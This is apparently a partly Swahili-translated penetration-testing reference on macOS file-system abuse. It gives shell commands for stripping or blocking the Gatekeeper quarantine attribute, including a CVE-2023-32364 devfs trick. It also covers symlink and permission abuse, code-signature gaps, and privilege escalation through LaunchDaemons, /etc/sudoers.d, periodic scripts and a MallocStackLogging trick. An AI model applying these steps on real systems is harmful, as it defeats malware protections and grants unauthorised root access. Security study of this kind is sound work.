POSIX permissions combinations

Permissions in a directory:

• read - unaweza kuhesabu entries za directory

• write - unaweza kufuta/kandika files katika directory na unaweza kufuta folda tupu.

• Lakini huwezi kufuta/kubadilisha folda zisizo tupu isipokuwa una ruhusa za kuandika juu yake.

• Huwezi kubadilisha jina la folda isipokuwa unamiliki.

• execute - ume ruhusiwa kupita katika directory - ikiwa huna haki hii, huwezi kufikia files zozote ndani yake, au katika folda ndogo zozote.

Dangerous Combinations

Jinsi ya kufuta file/folda inayomilikiwa na root, lakini:

• Mmiliki mmoja wa directory katika njia ni mtumiaji

• Mmiliki mmoja wa directory katika njia ni kikundi cha watumiaji chenye ruhusa za kuandika

• Kikundi cha watumiaji kina ruhusa za kuandika kwa file

Kwa yoyote ya mchanganyiko wa hapo juu, mshambuliaji anaweza kuingiza sym/hard link kwenye njia inayotarajiwa ili kupata kuandika kwa mamlaka.

Folder root R+X Special case

Ikiwa kuna files katika directory ambapo ni root pekee mwenye R+X access, hizo hazipatikani kwa mtu mwingine yeyote. Hivyo, udhaifu unaoruhusu kuhamasisha file inayoweza kusomwa na mtumiaji, ambayo haiwezi kusomwa kwa sababu ya kizuizi hicho, kutoka folda hii kwenda nyingine, inaweza kutumika vibaya kusoma files hizi.

Mfano katika: https://theevilbit.github.io/posts/exploiting_directory_permissions_on_macos/#nix-directory-permissions

Symbolic Link / Hard Link

Ikiwa mchakato wenye mamlaka unandika data katika file ambayo inaweza kudhibitiwa na mtumiaji mwenye mamlaka ya chini, au ambayo inaweza kuundwa awali na mtumiaji mwenye mamlaka ya chini. Mtumiaji anaweza tu kuielekeza kwenye file nyingine kupitia Symbolic au Hard link, na mchakato wenye mamlaka utaandika kwenye file hiyo.

Angalia katika sehemu nyingine ambapo mshambuliaji anaweza kutumia kuandika kwa mamlaka ili kupandisha mamlaka.

.fileloc

Files zenye .fileloc extension zinaweza kuelekeza kwenye programu nyingine au binaries hivyo wakati zinapofunguliwa, programu/binary itakuwa ndiyo itakayotekelezwa. Mfano:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>URL</key>
<string>file:///System/Applications/Calculator.app</string>
<key>URLPrefix</key>
<integer>0</integer>
</dict>
</plist>

Arbitrary FD

Ikiwa unaweza kufanya mchakato ufungue faili au folda kwa haki za juu, unaweza kutumia crontab kufungua faili katika /etc/sudoers.d na EDITOR=exploit.py, hivyo exploit.py itapata FD kwa faili ndani ya /etc/sudoers na kuifanya.

Kwa mfano: https://youtu.be/f1HA5QhLQ7Y?t=21098

Avoid quarantine xattrs tricks

Remove it

xattr -d com.apple.quarantine /path/to/file_or_app

uchg / uchange / uimmutable flag

Ikiwa faili/folda ina sifa hii isiyobadilika haitakuwa na uwezo wa kuweka xattr juu yake.

echo asd > /tmp/asd
chflags uchg /tmp/asd # "chflags uchange /tmp/asd" or "chflags uimmutable /tmp/asd"
xattr -w com.apple.quarantine "" /tmp/asd
xattr: [Errno 1] Operation not permitted: '/tmp/asd'

ls -lO /tmp/asd
# check the "uchg" in the output

defvfs mount

A devfs mount haiungi xattr, maelezo zaidi katika CVE-2023-32364

mkdir /tmp/mnt
mount_devfs -o noowners none "/tmp/mnt"
chmod 777 /tmp/mnt
mkdir /tmp/mnt/lol
xattr -w com.apple.quarantine "" /tmp/mnt/lol
xattr: [Errno 1] Operation not permitted: '/tmp/mnt/lol'

writeextattr ACL

ACL hii inazuia kuongeza xattrs kwenye faili

rm -rf /tmp/test*
echo test >/tmp/test
chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" /tmp/test
ls -le /tmp/test
ditto -c -k test test.zip
# Download the zip from the browser and decompress it, the file should be without a quarantine xattr

cd /tmp
echo y | rm test

# Decompress it with ditto
ditto -x -k --rsrc test.zip .
ls -le /tmp/test

# Decompress it with open (if sandboxed decompressed files go to the Downloads folder)
open test.zip
sleep 1
ls -le /tmp/test

com.apple.acl.text xattr + AppleDouble

AppleDouble muundo wa faili unakopi faili pamoja na ACE zake.

Katika kanuni ya chanzo inawezekana kuona kwamba uwakilishi wa maandiko wa ACL ulihifadhiwa ndani ya xattr inayoitwa com.apple.acl.text utawekwa kama ACL katika faili lililoshinikizwa. Hivyo, ikiwa umeweka programu katika faili la zip kwa muundo wa faili wa AppleDouble ukiwa na ACL inayozuia xattrs nyingine kuandikwa ndani yake... xattr ya karantini haikuwekwa katika programu:

Angalia ripoti ya asili kwa maelezo zaidi.

Ili kuiga hii tunahitaji kwanza kupata mfuatano sahihi wa acl:

# Everything will be happening here
mkdir /tmp/temp_xattrs
cd /tmp/temp_xattrs

# Create a folder and a file with the acls and xattr
mkdir del
mkdir del/test_fold
echo test > del/test_fold/test_file
chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" del/test_fold
chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" del/test_fold/test_file
ditto -c -k del test.zip

# uncomporess to get it back
ditto -x -k --rsrc test.zip .
ls -le test

(Note that even if this works the sandbox write the quarantine xattr before)

Sio kweli inahitajika lakini naiacha hapa tu kwa sababu:

Kupita Saini za Kanuni

Bundles zina faili _CodeSignature/CodeResources ambayo ina hash ya kila faili katika bundle. Kumbuka kwamba hash ya CodeResources pia imejumuishwa katika executable, hivyo hatuwezi kuingilia hapo pia.

Hata hivyo, kuna baadhi ya faili ambazo saini yake haitakaguliwa, hizi zina ufunguo omit katika plist, kama:

<dict>
...
<key>rules</key>
<dict>
...
<key>^Resources/.*\.lproj/locversion.plist$</key>
<dict>
<key>omit</key>
<true/>
<key>weight</key>
<real>1100</real>
</dict>
...
</dict>
<key>rules2</key>
...
<key>^(.*/)?\.DS_Store$</key>
<dict>
<key>omit</key>
<true/>
<key>weight</key>
<real>2000</real>
</dict>
...
<key>^PkgInfo$</key>
<dict>
<key>omit</key>
<true/>
<key>weight</key>
<real>20</real>
</dict>
...
<key>^Resources/.*\.lproj/locversion.plist$</key>
<dict>
<key>omit</key>
<true/>
<key>weight</key>
<real>1100</real>
</dict>
...
</dict>

Ni rahisi kuhesabu saini ya rasilimali kutoka kwa cli kwa:

openssl dgst -binary -sha1 /System/Cryptexes/App/System/Applications/Safari.app/Contents/Resources/AppIcon.icns | openssl base64

Mount dmgs

Mtumiaji anaweza kuunganisha dmg maalum iliyoundwa hata juu ya folda fulani zilizopo. Hivi ndivyo unavyoweza kuunda kifurushi cha dmg maalum chenye maudhui maalum:

# Create the volume
hdiutil create /private/tmp/tmp.dmg -size 2m -ov -volname CustomVolName -fs APFS 1>/dev/null
mkdir /private/tmp/mnt

# Mount it
hdiutil attach -mountpoint /private/tmp/mnt /private/tmp/tmp.dmg 1>/dev/null

# Add custom content to the volume
mkdir /private/tmp/mnt/custom_folder
echo "hello" > /private/tmp/mnt/custom_folder/custom_file

# Detach it
hdiutil detach /private/tmp/mnt 1>/dev/null

# Next time you mount it, it will have the custom content you wrote

# You can also create a dmg from an app using:
hdiutil create -srcfolder justsome.app justsome.dmg

Kawaida macOS inachomeka diski kwa kuzungumza na huduma ya Mach com.apple.DiskArbitrarion.diskarbitrariond (iliyotolewa na /usr/libexec/diskarbitrationd). Ikiwa utaongeza paramu -d kwenye faili la LaunchDaemons plist na kuanzisha upya, itahifadhi kumbukumbu katika /var/log/diskarbitrationd.log. Hata hivyo, inawezekana kutumia zana kama hdik na hdiutil kuwasiliana moja kwa moja na kext com.apple.driver.DiskImages.

Maandishi ya Huru

Mifumo ya sh ya Kila Wakati

Ikiwa skripti yako inaweza kutafsiriwa kama shell script unaweza kuandika upya /etc/periodic/daily/999.local shell script ambayo itazinduliwa kila siku.

Unaweza kuigiza utekelezaji wa skripti hii kwa: sudo periodic daily

Daemons

Andika LaunchDaemon ya huru kama /Library/LaunchDaemons/xyz.hacktricks.privesc.plist yenye plist inayotekeleza skripti ya huru kama:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.sample.Load</string>
<key>ProgramArguments</key>
<array>
<string>/Applications/Scripts/privesc.sh</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>

Just generate the script /Applications/Scripts/privesc.sh with the commands you would like to run as root.

Sudoers File

If you have arbitrary write, you could create a file inside the folder /etc/sudoers.d/ granting yourself sudo privileges.

PATH files

The file /etc/paths is one of the main places that populates the PATH env variable. You must be root to overwrite it, but if a script from privileged process is executing some command without the full path, you might be able to hijack it modifying this file.

You can also write files in /etc/paths.d to load new folders into the PATH env variable.

Generate writable files as other users

Hii itazalisha faili ambalo linamilikiwa na root ambalo linaweza kuandikwa na mimi (code from here). Hii inaweza pia kufanya kazi kama privesc:

DIRNAME=/usr/local/etc/periodic/daily

mkdir -p "$DIRNAME"
chmod +a "$(whoami) allow read,write,append,execute,readattr,writeattr,readextattr,writeextattr,chown,delete,writesecurity,readsecurity,list,search,add_file,add_subdirectory,delete_child,file_inherit,directory_inherit," "$DIRNAME"

MallocStackLogging=1 MallocStackLoggingDirectory=$DIRNAME MallocStackLoggingDontDeleteStackLogFile=1 top invalidparametername

FILENAME=$(ls "$DIRNAME")
echo $FILENAME

POSIX Shared Memory

POSIX shared memory inaruhusu michakato katika mifumo ya uendeshaji inayokubaliana na POSIX kufikia eneo la kawaida la kumbukumbu, ikirahisisha mawasiliano ya haraka ikilinganishwa na mbinu nyingine za mawasiliano kati ya michakato. Inahusisha kuunda au kufungua kitu cha kumbukumbu ya pamoja kwa kutumia shm_open(), kuweka ukubwa wake kwa kutumia ftruncate(), na kuunganisha katika nafasi ya anwani ya mchakato kwa kutumia mmap(). Michakato inaweza kisha kusoma moja kwa moja kutoka na kuandika kwenye eneo hili la kumbukumbu. Ili kudhibiti ufikiaji wa pamoja na kuzuia uharibifu wa data, mitambo ya usawazishaji kama vile mutexes au semaphores mara nyingi hutumiwa. Hatimaye, michakato huondoa na kufunga kumbukumbu ya pamoja kwa kutumia munmap() na close(), na kwa hiari kuondoa kitu cha kumbukumbu kwa kutumia shm_unlink(). Mfumo huu ni wa ufanisi hasa kwa IPC yenye ufanisi na haraka katika mazingira ambapo michakato mingi inahitaji kufikia data ya pamoja kwa haraka.

</details>

<details>

<summary>Mfano wa Kanuni ya Mtumiaji</summary>
```c
// gcc consumer.c -o consumer -lrt
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

int main() {
const char *name = "/my_shared_memory";
const int SIZE = 4096; // Size of the shared memory object

// Open the shared memory object
int shm_fd = shm_open(name, O_RDONLY, 0666);
if (shm_fd == -1) {
perror("shm_open");
return EXIT_FAILURE;
}

// Memory map the shared memory
void *ptr = mmap(0, SIZE, PROT_READ, MAP_SHARED, shm_fd, 0);
if (ptr == MAP_FAILED) {
perror("mmap");
return EXIT_FAILURE;
}

// Read from the shared memory
printf("Consumer received: %s\n", (char *)ptr);

// Cleanup
munmap(ptr, SIZE);
close(shm_fd);
shm_unlink(name); // Optionally unlink

return 0;
}

macOS Guarded Descriptors

macOSCguarded descriptors ni kipengele cha usalama kilichozinduliwa katika macOS ili kuboresha usalama na uaminifu wa file descriptor operations katika programu za mtumiaji. Hizi guarded descriptors zinatoa njia ya kuunganisha vizuizi maalum au "guards" na file descriptors, ambavyo vinatekelezwa na kernel.

Kipengele hiki ni muhimu hasa katika kuzuia aina fulani za udhaifu wa usalama kama vile unauthorized file access au race conditions. Udhaifu huu hutokea wakati kwa mfano thread inapata file description ikimpa thread nyingine yenye udhaifu ufikiaji juu yake au wakati file descriptor inachukuliwa na mchakato wa mtoto mwenye udhaifu. Baadhi ya kazi zinazohusiana na kazi hii ni:

• guarded_open_np: Fungua FD na guard

• guarded_close_np: Funga

• change_fdguard_np: Badilisha bendera za guard kwenye descriptor (hata kuondoa ulinzi wa guard)

References

• https://theevilbit.github.io/posts/exploiting_directory_permissions_on_macos/